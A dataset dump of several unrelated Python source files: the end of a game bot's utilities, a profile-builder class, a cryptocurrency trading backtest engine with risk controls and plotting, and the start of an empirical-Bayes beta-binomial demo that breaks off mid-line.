dropoff)\n\n shortcut_x = True if distance.x >= (game.game_map.width / 2) else False\n shortcut_y = True if distance.y >= (game.game_map.height / 2) else False\n\n# logging.debug(\"shortcut_x: {}\".format(shortcut_x))\n# logging.debug(\"shortcut_y: {}\".format(shortcut_y))\n\n if departure_lanes == \"e-w\":\n departure_distance = -DEPARTURE_DISTANCE if shortcut_x else DEPARTURE_DISTANCE\n departure_x = dropoff.x + departure_distance if destination.x > dropoff.x else dropoff.x - departure_distance\n departure_y = dropoff.y\n elif departure_lanes == \"n-s\":\n departure_distance = -DEPARTURE_DISTANCE if shortcut_y else DEPARTURE_DISTANCE\n departure_x = dropoff.x\n departure_y = dropoff.y + departure_distance if destination.y > dropoff.y else dropoff.y - departure_distance\n else:\n raise RuntimeError(\"Unknown departure_lanes: \" + str(departure_lanes))\n\n return Position(departure_x, departure_y)","sub_path":"bots/v17/myutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":22704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"73163382","text":"#build_profile\r\n\r\n#class for logical structuring on data being parsed into self.attributes\r\nclass profile(object):\r\n #kwargs implementation for all keyword arguments given after firstName and lastName\r\n def __init__(self, firstName, lastName, **kwargs):\r\n self.attributes = {}\r\n \r\n self.firstName = firstName\r\n self.attributes[\"first_name\"] = self.firstName\r\n \r\n self.lastName = lastName\r\n self.attributes[\"last_name\"] = self.lastName \r\n \r\n for key, value in kwargs.items():\r\n setattr(self, key, value)\r\n self.attributes[key] = value\r\n\r\n #getter and returner for self.attributes\r\n def attributesGetter(self):\r\n return self.attributes\r\n\r\n#instantiates and encapsulates profile from data given, and calls the current self.attributesGetter method\r\ndef build_profile(firstName, lastName, **kwargs):\r\n vars()[firstName+lastName] = profile(firstName, lastName, **kwargs)\r\n return vars()[firstName+lastName].attributesGetter()\r\n","sub_path":"buildprofile.py","file_name":"buildprofile.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230621614","text":"#!/usr/bin/python\n\"\"\"运行环境引擎\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dts\nfrom matplotlib import gridspec\nimport mpl_finance as mpf\nimport pandas as pd\nimport talib\nfrom datetime import datetime,timedelta\nimport common.log as log\nimport utils.tools as ts\nimport utils.indicator as ic\nfrom setup import mongo_user, mongo_pwd, db_url\nimport common.xquant as xq\nimport db.mongodb as md\nfrom exchange.binanceExchange import BinanceExchange\nfrom exchange.okexExchange import OkexExchange\n\n\nclass Engine:\n \"\"\"引擎\"\"\"\n\n def __init__(self, instance_id, config, db_orders_name=None):\n self.instance_id = instance_id\n self.config = config\n\n exchange = config[\"exchange\"]\n if exchange == \"binance\":\n self.kline_column_names = BinanceExchange.get_kline_column_names()\n elif exchange == \"okex\":\n self.kline_column_names = OkexExchange.get_kline_column_names()\n\n self.md_db = md.MongoDB(mongo_user, mongo_pwd, exchange, db_url)\n self.td_db = md.MongoDB(mongo_user, mongo_pwd, \"xquant\", db_url)\n\n self.value = 100\n\n if db_orders_name:\n self.db_orders_name = db_orders_name\n self.td_db.ensure_index(db_orders_name, [(\"instance_id\",1),(\"symbol\",1)])\n\n self.can_open_time = None\n\n self.tp_cc = {\"base_open\": 0}\n\n\n def log_info(self, info):\n log.info(info)\n\n def log_warning(self, info):\n log.warngin(info)\n\n def log_error(self, info):\n log.error(info)\n\n def log_critical(self, info):\n log.critical(info)\n\n def log_debug(self, info):\n log.debug(info)\n\n def get_kline_column_names(self):\n return self.kline_column_names\n\n def get_floating_profit(self, direction, amount, value, commission, cur_price):\n if direction == xq.DIRECTION_LONG:\n cycle_profit = cur_price * amount + value\n else:\n cycle_profit = value - cur_price * amount\n\n cycle_profit -= commission\n\n return cycle_profit\n\n def _get_position(self, symbol, orders, cur_price):\n target_coin, base_coin = xq.get_symbol_coins(symbol)\n\n info = self._get_position_from_orders(symbol, orders)\n\n total_profit = info[\"history_profit\"]\n if info[\"amount\"] > 0:\n cycle_profit = self.get_floating_profit(info[\"direction\"], info[\"amount\"], info[\"value\"], info[\"commission\"], cur_price)\n total_profit += cycle_profit\n\n open_value = self.value\n if self.config[\"mode\"] == 1:\n open_value += info[\"history_profit\"]\n\n info[\"floating_profit\"] = cycle_profit\n info[\"floating_profit_rate\"] = cycle_profit / open_value\n\n if orders:\n info[\"pst_rate\"] = orders[-1][\"pst_rate\"]\n\n self.log_info(\n \"symbol( %s ); current price( %g ); position(%s%s%s history_profit: %g, history_commission: %g, history_profit_rate: %g, total_profit_rate: %g)\" % (\n symbol,\n cur_price,\n \"amount: %f, price: %g, cost price: %g, value: %g, commission: %g, limit: %g, profit: %g,\"\n % (\n info[\"amount\"],\n info[\"price\"],\n info[\"cost_price\"],\n info[\"value\"],\n info[\"commission\"],\n self.value,\n info[\"floating_profit\"],\n )\n if info[\"amount\"]\n else \"\",\n \" profit rate: %g,\"\n % (info[\"floating_profit_rate\"])\n if info[\"value\"]\n else \"\",\n \" start_time: %s\\n,\" % info[\"start_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n if \"start_time\" in info and info[\"start_time\"]\n else \"\",\n info[\"history_profit\"],\n info[\"history_commission\"],\n (info[\"history_profit\"] / self.value),\n (total_profit / self.value)\n )\n )\n # print(info)\n return info\n\n def risk_control(self, position_info, cur_price):\n \"\"\" 风控 \"\"\"\n if position_info[\"amount\"] == 0:\n return []\n\n sl_signals = self.stop_loss(position_info, cur_price)\n tp_signals = self.take_profit(position_info, cur_price)\n return sl_signals + tp_signals\n\n def stop_loss(self, position_info, cur_price):\n \"\"\" 止损 \"\"\"\n sl_signals = []\n # 风控第一条:亏损金额超过额度的10%,如额度1000,亏损金额超过100即刻清仓\n limit_mode = self.config[\"mode\"]\n limit_value = self.value\n if limit_mode == 0:\n pass\n elif limit_mode == 1:\n limit_value += position_info[\"history_profit\"]\n else:\n self.log_error(\"请选择额度模式,默认是0\")\n\n sl_cfg = self.config[\"risk_control\"][\"stop_loss\"]\n sl_td_h = ts.get_next_open_timedelta(self.now())\n\n if \"base_value\" in sl_cfg and sl_cfg[\"base_value\"] > 0 and limit_value * sl_cfg[\"base_value\"] + position_info[\"floating_profit\"] <= 0:\n sl_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止损\", \"亏损金额超过额度的{:8.2%}\".format(sl_cfg[\"base_value\"]), sl_td_h))\n\n # 风控第二条:当前价格低于持仓均价的90%,即刻清仓\n pst_price = position_info[\"price\"]\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n loss_rate = 1 - (cur_price / pst_price)\n else:\n loss_rate = (cur_price / pst_price) - 1\n if pst_price > 0 and \"base_price\" in sl_cfg and sl_cfg[\"base_price\"] > 0 and loss_rate >= sl_cfg[\"base_price\"]:\n sl_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止损\", \"下跌了持仓均价的{:8.2%}\".format(sl_cfg[\"base_price\"]), sl_td_h))\n\n return sl_signals\n\n def take_profit(self, position_info, cur_price):\n \"\"\" 止盈 \"\"\"\n tp_signals = []\n\n if \"high\" not in position_info:\n return tp_cfg\n\n tp_cfg = self.config[\"risk_control\"][\"take_profit\"]\n\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n price_offset = position_info[\"high\"] - cur_price\n else:\n price_offset = cur_price - position_info[\"low\"]\n\n if \"base_open\" in tp_cfg:\n for bo_band in tp_cfg[\"base_open\"]:\n high_profit_rate = position_info[\"high\"] / position_info[\"price\"] - 1\n cur_profit_rate = cur_price / position_info[\"price\"] - 1\n fall_profit_rate = high_profit_rate - cur_profit_rate\n if high_profit_rate > bo_band[0]:\n self.log_info(\"base_open tp_cc 1 = %s\" % self.tp_cc[\"base_open\"])\n if fall_profit_rate >= bo_band[1]:\n self.tp_cc[\"base_open\"] += 1\n self.log_info(\"base_open tp_cc 2 = %s\" % self.tp_cc[\"base_open\"])\n if self.tp_cc[\"base_open\"] >= 1 :\n tp_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止盈\", \"盈利回落(基于持仓价) fall rate:{:8.2%} ( {:8.2%}, {:8.2%} )\".format(fall_profit_rate, bo_band[0], bo_band[1])))\n else:\n self.tp_cc[\"base_open\"] = 0\n\n break\n\n if position_info[\"direction\"] == xq.DIRECTION_LONG:\n price_rate = cur_price / position_info[\"high\"]\n else:\n price_rate = position_info[\"low\"] / cur_price\n if \"base_high\" in tp_cfg and tp_cfg[\"base_high\"] > 0 and price_rate < (1 - tp_cfg[\"base_high\"]):\n tp_signals.append(xq.create_signal(position_info[\"direction\"], xq.CLOSE_POSITION, 0, \" 止盈\", \"盈利回落,基于最高价的{:8.2%}\".format(tp_cfg[\"base_high\"])))\n\n return tp_signals\n \"\"\"\n if position_info[\"amount\"] > 0:\n today_fall_rate = ts.cacl_today_fall_rate(klines, cur_price)\n if today_fall_rate > 0.1:\n # 清仓卖出\n check_signals.append(\n xq.create_signal(xq.SIDE_SELL, 0, \"平仓:当前价距离当天最高价回落10%\")\n )\n\n period_start_time = position_info[\"start_time\"]\n period_fall_rate = ts.cacl_period_fall_rate(\n klines, period_start_time, cur_price\n )\n if period_fall_rate > 0.1:\n # 清仓卖出\n check_signals.append(\n xq.create_signal(xq.SIDE_SELL, 0, \"平仓:当前价距离周期内最高价回落10%\")\n )\n elif period_fall_rate > 0.05:\n # 减仓一半\n check_signals.append(\n xq.create_signal(xq.SIDE_SELL, 0.5, \"减仓:当前价距离周期内最高价回落5%\")\n )\n \"\"\"\n\n def handle_order(self, symbol, position_info, cur_price, check_signals):\n \"\"\" 处理委托 \"\"\"\n rc_signals = self.risk_control(position_info, cur_price)\n signals = rc_signals + check_signals\n if not signals:\n return\n for signal in signals:\n self.log_info(\"signal(%r)\" % signal[\"describe\"])\n\n ds_signal = xq.decision_signals(signals)\n self.log_info(\n \"decision signal (%s %s), position rate(%g), describe(%s), can buy after(%s)\" % (\n ds_signal[\"direction\"],\n ds_signal[\"action\"],\n ds_signal[\"pst_rate\"],\n ds_signal[\"describe\"],\n ds_signal[\"can_open_time\"]\n )\n )\n\n if ds_signal[\"action\"] is None:\n return\n\n if self.can_open_time:\n if self.now() < self.can_open_time:\n # 限定的时间范围内,只能平仓,不能开仓\n if ds_signal[\"action\"] != xq.CLOSE_POSITION:\n return\n else:\n # 时间范围之外,恢复\n self.can_open_time = None\n\n if ds_signal[\"can_open_time\"]:\n if not self.can_open_time or (self.can_open_time and self.can_open_time < self.now() + ds_signal[\"can_open_time\"]):\n self.can_open_time = self.now() + ds_signal[\"can_open_time\"]\n self.log_info(\"can buy time: %s\" % self.can_open_time)\n\n if ds_signal[\"pst_rate\"] > 1 or ds_signal[\"pst_rate\"] < 0:\n self.log_warning(\"仓位率(%g)超出范围(0 ~ 1)\" % ds_signal[\"pst_rate\"])\n return\n\n limit_price_rate = self.config[\"limit_price_rate\"]\n limit_mode = self.config[\"mode\"]\n limit_value = self.value\n if limit_mode == 0:\n pass\n elif limit_mode == 1:\n limit_value += position_info[\"history_profit\"]\n else:\n self.log_error(\"请选择额度模式,默认是0\")\n\n target_coin, base_coin = xq.get_symbol_coins(symbol)\n\n if ds_signal[\"action\"] == xq.OPEN_POSITION:\n # 开仓\n if \"pst_rate\" in position_info and position_info[\"pst_rate\"] >= ds_signal[\"pst_rate\"]:\n return\n\n pst_cost = abs(position_info[\"value\"]) + position_info[\"commission\"]\n base_amount = limit_value * ds_signal[\"pst_rate\"] - pst_cost\n if base_amount <= 0:\n return\n\n if ds_signal[\"direction\"] == xq.DIRECTION_LONG:\n # 做多开仓\n base_balance = self.get_balances(base_coin)\n self.log_info(\"base balance: %s\" % base_balance)\n base_amount = min(xq.get_balance_free(base_balance), base_amount)\n self.log_info(\"base_amount: %g\" % base_amount)\n if base_amount <= 0: #\n return\n target_amount = base_amount / (cur_price * (1 + self.config[\"commission_rate\"]))\n rate = 1 + limit_price_rate[\"open\"]\n else:\n # 做空开仓\n target_balance = self.get_balances(target_coin)\n self.log_info(\"target balance: %s\" % target_balance)\n target_amount = min(xq.get_balance_free(target_balance), base_amount / cur_price)\n self.log_info(\"target_amount: %g\" % target_amount)\n if target_amount <= 0: #\n return\n rate = 1 - limit_price_rate[\"open\"]\n else:\n # 平仓\n if (not \"pst_rate\" in position_info) or position_info[\"pst_rate\"] <= ds_signal[\"pst_rate\"]:\n return\n\n target_amount = abs(position_info[\"amount\"]) * (position_info[\"pst_rate\"] - ds_signal[\"pst_rate\"]) / position_info[\"pst_rate\"]\n\n if ds_signal[\"direction\"] == xq.DIRECTION_LONG:\n # 做多平仓\n rate = 1 - limit_price_rate[\"close\"]\n else:\n # 做空平仓\n rate = 1 + limit_price_rate[\"close\"]\n\n target_amount = ts.reserve_float(target_amount, self.config[\"digits\"][target_coin])\n self.log_info(\"%s %s target amount: %g\" % (ds_signal[\"direction\"], ds_signal[\"action\"], target_amount))\n if target_amount <= 0:\n return\n limit_price = ts.reserve_float(cur_price * rate, self.config[\"digits\"][base_coin])\n order_rmk = ds_signal[\"describe\"] + \": \" + ds_signal[\"rmk\"]\n order_id = self.send_order_limit(\n ds_signal[\"direction\"],\n ds_signal[\"action\"],\n symbol,\n ds_signal[\"pst_rate\"],\n cur_price,\n limit_price,\n target_amount,\n \"%s, timedelta: %s, can buy after: %s\" % (order_rmk, ds_signal[\"can_open_time\"], self.can_open_time) if (ds_signal[\"can_open_time\"] or self.can_open_time) else \"%s\" % (order_rmk),\n )\n self.log_info(\n \"current price: %g; rate: %g; order_id: %s\" % (cur_price, rate, order_id)\n )\n\n def check_order(symbol, order):\n if order[\"direction\"] != xq.DIRECTION_LONG and order[\"direction\"] != xq.DIRECTION_SHORT:\n self.log_error(\"错误的委托方向\")\n return False\n if order[\"action\"] != xq.OPEN_POSITION and order[\"action\"] != xq.CLOSE_POSITION:\n self.log_error(\"错误的委托动作\")\n return False\n return True\n\n def get_order_value(self, order):\n if (order[\"action\"] == xq.OPEN_POSITION and order[\"direction\"] == xq.DIRECTION_LONG) or (order[\"action\"] == xq.CLOSE_POSITION and order[\"direction\"] == xq.DIRECTION_SHORT):\n return - order[\"deal_value\"]\n else:\n return order[\"deal_value\"]\n\n def get_order_commission(self, order):\n return order[\"deal_value\"] * self.config[\"commission_rate\"]\n\n def _get_position_from_orders(self, symbol, orders):\n cycle_first_order = None\n\n history_profit = 0\n history_commission = 0\n cycle_amount = 0\n cycle_value = 0\n cycle_commission = 0\n target_coin, base_coin = xq.get_symbol_coins(symbol)\n for order in orders:\n if not self.check_order(order):\n return None\n\n if order[\"action\"] == xq.OPEN_POSITION:\n if cycle_amount == 0:\n cycle_first_order = order\n cycle_amount += order[\"deal_amount\"]\n else:\n cycle_amount -= order[\"deal_amount\"]\n cycle_amount = ts.reserve_float(cycle_amount, self.config[\"digits\"][target_coin])\n cycle_value += self.get_order_value(order)\n cycle_commission += self.get_order_commission(order)\n\n if cycle_amount == 0:\n history_profit += cycle_value - cycle_commission\n history_commission += cycle_commission\n cycle_value = 0\n cycle_commission = 0\n\n # 持仓信息\n pst_info = {\n \"amount\": cycle_amount, # 数量\n \"value\": cycle_value, # 金额\n \"commission\": cycle_commission, # 佣金\n \"history_profit\": history_profit, # 历史利润\n \"history_commission\": history_commission, # 历史佣金\n }\n\n if cycle_amount > 0:\n pst_info[\"price\"] = abs(cycle_value) / cycle_amount\n pst_info[\"cost_price\"] = (abs(cycle_value) + cycle_commission) / cycle_amount\n\n pst_info[\"direction\"] = cycle_first_order[\"direction\"]\n pst_info[\"start_time\"] = datetime.fromtimestamp(cycle_first_order[\"create_time\"])\n if \"high\" in order:\n pst_info[\"high\"] = cycle_first_order[\"high\"]\n pst_info[\"low\"] = cycle_first_order[\"low\"]\n\n return pst_info\n\n\n def stat_orders(self, symbol, orders):\n cycle_id = 1\n\n history_profit = 0\n history_commission = 0\n cycle_amount = 0\n cycle_value = 0\n cycle_commission = 0\n target_coin, base_coin = xq.get_symbol_coins(symbol)\n for order in orders:\n if not self.check_order(order):\n return None\n\n order[\"cycle_id\"] = cycle_id\n\n if order[\"action\"] == xq.OPEN_POSITION:\n cycle_amount += order[\"deal_amount\"]\n else:\n cycle_amount -= order[\"deal_amount\"]\n cycle_amount = ts.reserve_float(cycle_amount, self.config[\"digits\"][target_coin])\n cycle_value += self.get_order_value(order)\n cycle_commission += self.get_order_commission(order)\n\n deal_price = order[\"deal_value\"] / order[\"deal_amount\"]\n cycle_profit = self.get_floating_profit(order[\"direction\"], cycle_amount, cycle_value, cycle_commission, deal_price)\n order[\"floating_profit\"] = cycle_profit\n order[\"history_profit\"] = history_profit\n order[\"total_profit\"] = cycle_profit + history_profit\n\n open_value = self.value\n if self.config[\"mode\"] == 1:\n open_value += history_profit\n order[\"floating_profit_rate\"] = order[\"floating_profit\"] / open_value\n order[\"history_profit_rate\"] = order[\"history_profit\"] / self.value\n order[\"total_profit_rate\"] = order[\"total_profit\"] / self.value\n\n if cycle_amount == 0:\n history_profit += cycle_profit\n history_commission += cycle_commission\n cycle_value = 0\n cycle_commission = 0\n cycle_id += 1\n\n return orders\n\n\n def analyze(self, symbol, orders):\n if len(orders) == 0:\n return\n\n orders = self.stat_orders(symbol, orders)\n\n print_switch_hl = True\n print_switch_deal = False\n print_switch_commission = False\n print_switch_profit = False\n\n title = \" id\"\n title += \" profit_rate\"\n title += \" create_time price\"\n\n if print_switch_hl:\n title += \" ( )\"\n title += \" pst_rate\"\n\n if print_switch_deal:\n title += \" deal_amount deal_value\"\n if print_switch_commission:\n title += \" total_commission\"\n if print_switch_profit:\n title += \" profit(total)\"\n title += \" rmk\"\n print(title)\n\n total_commission = 0\n for index ,order in enumerate(orders):\n commission = order[\"deal_value\"] * self.config[\"commission_rate\"]\n total_commission += commission\n\n order[\"trade_time\"] = datetime.fromtimestamp(order[\"create_time\"])\n\n info = \"%3d\" % (index)\n info += \" {:7.2%}({:8.2%})\".format(\n order[\"floating_profit_rate\"], order[\"total_profit_rate\"]\n )\n info += \" %s %10g\" % (\n datetime.fromtimestamp(order[\"create_time\"]),\n order[\"deal_value\"]/order[\"deal_amount\"],\n )\n\n if print_switch_hl:\n total_commission_rate = 0 # 2 * self.config[\"commission_rate\"]\n if \"high\" in order:\n deal_price = order[\"deal_value\"]/order[\"deal_amount\"]\n if order[\"direction\"] == xq.DIRECTION_LONG:\n tmp_profit_rate = order[\"high\"] / deal_price - 1 - total_commission_rate\n else:\n tmp_profit_rate = 1 - order[\"high\"] / deal_price - total_commission_rate\n\n info += \" ({:8.2%}\".format(tmp_profit_rate)\n info += \" %10g, %s)\" % (order[\"high\"], datetime.fromtimestamp(order[\"high_time\"]))\n else:\n pre_deal_price = pre_order[\"deal_value\"]/pre_order[\"deal_amount\"]\n if order[\"direction\"] == xq.DIRECTION_LONG:\n tmp_profit_rate = pre_order[\"low\"] / pre_deal_price - 1 - total_commission_rate\n else:\n tmp_profit_rate = 1 - pre_order[\"low\"] / pre_deal_price - total_commission_rate\n info += \" ({:8.2%}\".format(tmp_profit_rate)\n info += \" %10g, %s)\" % (pre_order[\"low\"], datetime.fromtimestamp(pre_order[\"low_time\"]))\n\n info += \" %s,%5s\" % (\n order[\"direction\"],\n order[\"action\"],\n )\n info += \" {:8.2f}\".format(order[\"pst_rate\"])\n\n if print_switch_deal:\n info += \" %11g %10g\" % (\n order[\"deal_amount\"],\n order[\"deal_value\"],\n )\n if print_switch_commission:\n info += \" %16g\" % (\n total_commission,\n )\n if print_switch_profit:\n info += \" {:8.2f}({:9.2f})\".format(\n order[\"floating_profit\"],\n order[\"total_profit\"],\n )\n info += \" %s\" % (order[\"rmk\"])\n\n pre_order = order\n print(info)\n\n orders_df = pd.DataFrame(orders)\n\n orders_df[\"create_time\"] = orders_df[\"create_time\"].map(lambda x: datetime.fromtimestamp(x))\n orders_df[\"deal_price\"] = orders_df[\"deal_value\"] / orders_df[\"deal_amount\"]\n orders_df[\"commission\"] = orders_df[\"deal_value\"] * self.config[\"commission_rate\"]\n\n\n orders_df[\"signal_id\"] = orders_df[\"rmk\"].map(lambda x: x.split(\": \")[0])\n orders_df[\"signal_rmk\"] = orders_df[\"rmk\"].map(lambda x: x.split(\": \")[1])\n del orders_df[\"order_id\"]\n del orders_df[\"instance_id\"]\n del orders_df[\"rmk\"]\n #print(orders_df)\n self.stat(\"total\", orders_df)\n\n for signal_id in orders_df[\"signal_id\"].drop_duplicates().values:\n #print(signal_id)\n\n cycle_ids = orders_df[(orders_df[\"signal_id\"]==signal_id)][\"cycle_id\"]\n #print(cycle_ids)\n\n self.stat(signal_id, orders_df[(orders_df[\"cycle_id\"].isin(cycle_ids))] )\n\n\n def calc(self, symbol, orders):\n if len(orders) <= 0:\n return 0, 0, 0, 0\n orders_df = pd.DataFrame(self.calc_order(symbol, orders))\n close_df = orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION)]\n\n win_df = close_df[(close_df[\"floating_profit_rate\"] > 0)]\n loss_df =close_df[(close_df[\"floating_profit_rate\"] < 0)]\n win_count = len(win_df)\n loss_count = len(loss_df)\n\n total_profit_rate = close_df[\"floating_profit\"].sum() / self.value\n sum_profit_rate = close_df[\"floating_profit_rate\"].sum()\n return round(total_profit_rate, 4), round(sum_profit_rate, 4), win_count, loss_count\n\n\n def stat(self, signal_id, orders_df):\n print(\"\\n signal: \" + signal_id)\n win_df = orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION) & (orders_df[\"floating_profit_rate\"] > 0)]\n loss_df =orders_df[(orders_df[\"action\"]==xq.CLOSE_POSITION) & (orders_df[\"floating_profit_rate\"] < 0)]\n\n win_count = len(win_df)\n fail_count = len(loss_df)\n if win_count > 0 or fail_count > 0:\n win_rate = win_count / (win_count + fail_count)\n else:\n win_rate = 0\n print(\"win count: %g, loss count: %g, win rate: %4.2f%%\" % (win_count, fail_count, round(win_rate*100, 2)))\n\n w_profit_rates = win_df[\"floating_profit_rate\"]\n l_profit_rates = loss_df[\"floating_profit_rate\"]\n print(\"profit rate(total: %6.2f%%, max: %6.2f%%, min: %6.2f%%, average: %6.2f%%)\" % (round(w_profit_rates.sum()*100, 2), round(w_profit_rates.max()*100, 2), round(w_profit_rates.min()*100, 2), round(w_profit_rates.mean()*100, 2)))\n print(\"loss rate(total: %6.2f%%, max: %6.2f%%, min: %6.2f%%, average: %6.2f%%)\" % (round(l_profit_rates.sum()*100, 2), round(l_profit_rates.min()*100, 2), round(l_profit_rates.max()*100, 2), round(l_profit_rates.mean()*100, 2)))\n\n if fail_count > 0:\n kelly = win_rate - (1-win_rate)/(w_profit_rates.mean()/abs(l_profit_rates.mean()))\n else:\n kelly = win_rate\n print(\"Kelly Criterion: %.2f%%\" % round(kelly*100, 2))\n\n\n def display(self, symbol, orders, klines):\n\n \"\"\"\n gs = gridspec.GridSpec(8, 1)\n gs.update(left=0.04, bottom=0.04, right=1, top=1, wspace=0, hspace=0)\n axes = [\n plt.subplot(gs[0:-2, :]),\n #plt.subplot(gs[-4:-2, :]),\n plt.subplot(gs[-2:-1, :]),\n plt.subplot(gs[-1, :])\n ]\n \"\"\"\n fig, axes = plt.subplots(5,1, sharex=True)\n fig.subplots_adjust(left=0.04, bottom=0.04, right=1, top=1, wspace=0, hspace=0)\n\n trade_times = [order[\"trade_time\"] for order in orders]\n\n quotes = []\n for k in klines:\n d = datetime.fromtimestamp(k[0]/1000)\n quote = (dts.date2num(d), float(k[1]), float(k[4]), float(k[2]), float(k[3]))\n quotes.append(quote)\n\n mpf.candlestick_ochl(axes[0], quotes, width=0.2, colorup='g', colordown='r')\n axes[0].set_ylabel('price')\n axes[0].grid(True)\n axes[0].autoscale_view()\n axes[0].xaxis_date()\n axes[0].plot(trade_times, [(order[\"deal_value\"] / order[\"deal_amount\"]) for order in orders], \"o--\")\n\n klines_df = pd.DataFrame(klines, columns=self.kline_column_names)\n open_times = [datetime.fromtimestamp((open_time/1000)) for open_time in klines_df[\"open_time\"]]\n klines_df[\"close\"] = pd.to_numeric(klines_df[\"close\"])\n base_close = klines_df[\"close\"].values[0]\n\n klines_df[\"ATR\"] = talib.ATR(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"], timeperiod=14)\n klines_df[\"NATR\"] = talib.NATR(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"], timeperiod=14)\n klines_df[\"TRANGE\"] = talib.TRANGE(klines_df[\"high\"], klines_df[\"low\"], klines_df[\"close\"])\n\n # axes[0].plot(open_times, klines_df[\"ATR\"]*10, \"y:\", label=\"ATR\")\n\n axes[1].set_ylabel('volatility')\n axes[1].grid(True)\n axes[1].plot(open_times, klines_df[\"ATR\"], \"y:\", label=\"ATR\")\n axes[1].plot(open_times, klines_df[\"NATR\"], \"k--\", label=\"NATR\")\n axes[1].plot(open_times, klines_df[\"TRANGE\"], \"c--\", label=\"TRANGE\")\n\n ks, ds, js = ic.pd_kdj(klines_df)\n axes[2].set_ylabel('kdj')\n axes[2].grid(True)\n axes[2].plot(open_times, ks, \"b\", label=\"k\")\n axes[2].plot(open_times, ds, \"y\", label=\"d\")\n axes[2].plot(open_times, js, \"m\", label=\"j\")\n\n axes[-2].set_ylabel('total profit rate')\n axes[-2].grid(True)\n axes[-2].plot(trade_times, [round(100*order[\"total_profit_rate\"], 2) for order in orders], \"go--\")\n axes[-2].plot(open_times, [round(100*((close/base_close)-1), 2) for close in klines_df[\"close\"]], \"r--\")\n\n axes[-1].set_ylabel('rate')\n axes[-1].grid(True)\n #axes[-1].set_label([\"position rate\", \"profit rate\"])\n axes[-1].plot(trade_times ,[round(100*order[\"pst_rate\"], 2) for order in orders], \"k-\", drawstyle=\"steps-post\", label=\"position\")\n axes[-1].plot(trade_times ,[round(100*order[\"floating_profit_rate\"], 2) for order in orders], \"g--\", drawstyle=\"steps\", label=\"profit\")\n \"\"\"\n trade_times = []\n pst_rates = []\n for i, order in enumerate(orders):\n #补充\n if i > 0 and orders[i-1][\"pst_rate\"] > 0:\n tmp_trade_date = orders[i-1][\"trade_time\"].date() + timedelta(days=1)\n while tmp_trade_date < order[\"trade_time\"].date():\n trade_times.append(tmp_trade_date)\n pst_rates.append(orders[i-1][\"pst_rate\"])\n print(\"add %s, %s\" % (tmp_trade_date, orders[i-1][\"pst_rate\"]))\n tmp_trade_date += timedelta(days=1)\n\n # 添加\n trade_times.append(order[\"trade_time\"])\n pst_rates.append(order[\"pst_rate\"])\n print(\"%s, %s\" % (order[\"trade_time\"], order[\"pst_rate\"]))\n plt.bar(trade_times, pst_rates, width= 0.3) # \n \"\"\"\n\n plt.show()\n\n","sub_path":"engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":28919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200402776","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Ang Ming Liang\n\nBased on https://github.com/probml/pmtk3/blob/master/demos/ebBinom.m\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import beta\nimport matplotlib.pyplot as plt\nfrom scipy.special import digamma\nimport pyprobml_utils as pml\n\ny = np.array([\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, \n 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 5, \n 2, 5, 3, 2, 7, 7, 3, 3, 2, 9, 10, 4, 4, 4, 4, 4, 4, \n 4, 10, 4, 4, 4, 5, 11, 12, 5, 5, 6, 5, 6, 6, 6, 6, \n 16, 15, 15, 9, 4])\n\nn = np.array([20, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 18, 18, 17, \n 20, 20, 20, 20, 19, 19, 18, 18, 25, 24, 23, 20, 20, 20, \n 20, 20, 20, 10, 49, 19, 46, 27, 17, 49, 47, 20, 20, 13, \n 48, 50, 20, 20, 20, 20, 20, 20, 20, 48, 19, 19, 19, 22, \n 46, 49, 20, 20, 23, 19, 22, 20, 20, 20, 52, 46, 47, 24, 14])\n\nX = np.array([y, n-y]).T\n\ndef dirichlet_moment_match(data):\n a = np.mean(data, axis=0)\n m2 = np.mean(data*data, axis=0)\n ok = a>0\n s = (a[ok] - m2[ok]) / (m2[ok] - a[ok]**2)\n s = np.median(s)\n if s == 0:\n s = 1\n return a*s\n\ndef polya_moment_match(data):\n sdata = np.expand_dims(np.sum(X, axis=1) ,axis=1)\n p = data / sdata\n a = dirichlet_moment_match(p)\n return a \n\ndef polya_fit_simple(data):\n a = polya_moment_match(data)\n N,K = data.shape\n for _ in range(100):\n sa = np.sum(a)\n g = np.sum(digamma(data + a), axis=0) - N*digamma(a)\n h = sum(digamma(np.sum(X, axis=1) + np.sum(a))) - N*digamma(np.sum(a))\n a = a * g / h\n return a\n\nalphas = polya_fit_simple(X);\na, b = alphas\n\npopMean = a/(a+b)\naPost = a + y\nbPost = b + n - y\nmeantheta = aPost/(aPost + bPost)\nquartiles = np.array([[beta.ppf(0.25, a,b), beta.ppf(0.75, a, b),beta.ppf(0.50, a, b)] \n for (a,b) in zip(aPost, bPost)])\nCItheta, mediantheta = quartiles[:, :2], quartiles[:, 2]\n\nthetaMLE = y/n\nthetaPooledMLE = np.sum(y)/np.sum(n)\nx = np.arange(0, len(y))\n\n# Plot\n\nplt.figure(figsize=(10, 3))\nplt.title('num. positives')\nplt.bar(x, y)\nplt.xlim(0, 70)\nplt.ylim(0, 20)\npml.savefig('num_positives.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title('pop size')\nplt.bar(x, n)\nplt.xlim(0, 70)\nplt.ylim(0, 